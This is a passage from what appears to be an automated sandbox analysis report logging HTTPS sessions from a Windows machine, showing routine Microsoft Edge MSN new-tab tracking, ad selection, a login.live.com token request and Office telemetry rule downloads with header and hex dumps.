                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    Cookie: UID=1BBb0735b69c9f65be6a9b11732694808; XID=1BBb0735b69c9f65be6a9b11732694808
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                    Via: 1.1 aa7ca65bca4d95ba9a04dd166671496c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: _kz6u2cBjeMG_m2xUOiI-hnHMmQSiJAVc5Wq6TegF3onA0C6NuKWWA==


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    104192.168.2.74987720.231.128.67443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                    Content-Length: 3592
                                                                                                                                                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 27 Nov 2024 08:05:51 GMT
                                                                                                                                                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                    x-ms-route-info: C525_BAY
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 63420e2f-c4c5-4b6f-bddc-6bdcf1cdf7db
                                                                                                                                                                                                                                                                                                                    PPServer: PPV: 30 H: PH1PEPF00011EFC V: 0
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 11389
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    105192.168.2.74988313.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 408
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 97970dc3-901e-008f-6c91-3f67a6000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080650Z-174f7845968vqt9xhC1EWRgten0000000wr0000000004h0s
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    106192.168.2.74988513.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:51 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 469
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: d3508ca6-601e-003d-4e91-3f6f25000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080651Z-174f7845968cdxdrhC1EWRg0en0000000wh000000000ar9b
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    107192.168.2.74988613.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:51 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 416
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3111ff0c-301e-001f-4971-40aa3a000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080651Z-174f7845968vqt9xhC1EWRgten0000000wt0000000001pth
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    108192.168.2.74988720.110.205.1194438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC1261OUTGET /c.gif?rnd=1732700967945&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=3717764927f647ecb68b34236b867e95&activityId=3717764927f647ecb68b34236b867e95&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=47F7869059534BA19110C6BE745DBB28&MUID=39EBC277A9596CA639AAD733A8706D90 HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: c.msn.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 16 Oct 2024 16:24:13 GMT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    ETag: "8d3dafd6e71fdb1:0"
                                                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                                    Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MUID=39EBC277A9596CA639AAD733A8706D90; domain=.msn.com; expires=Mon, 22-Dec-2025 08:06:51 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                                    Set-Cookie: SRM_M=39EBC277A9596CA639AAD733A8706D90; domain=c.msn.com; expires=Mon, 22-Dec-2025 08:06:51 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MR=0; domain=c.msn.com; expires=Wed, 04-Dec-2024 08:06:51 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                    Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Wed, 27-Nov-2024 08:16:51 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:51 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 42
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    109192.168.2.74988813.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:51 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 77f1aa82-301e-003f-6391-3f266f000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080651Z-174f7845968vqt9xhC1EWRgten0000000wrg000000003vrr
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    110192.168.2.74989420.96.153.1114438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:51 UTC1018OUTGET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=39EBC277A9596CA639AAD733A8706D90&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-2063246587742936609&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=28783dc8111142cab929e8081cdb035f HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: arc.msn.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:52 UTC777INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Length: 2779
                                                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                    ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"1,P425132813-T700343892-C128000000002114509+B+P60+S1"},{"BATCH_REDIRECT_STORE":"B128000000002114509+P0+S0"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}]
                                                                                                                                                                                                                                                                                                                    Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                    X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
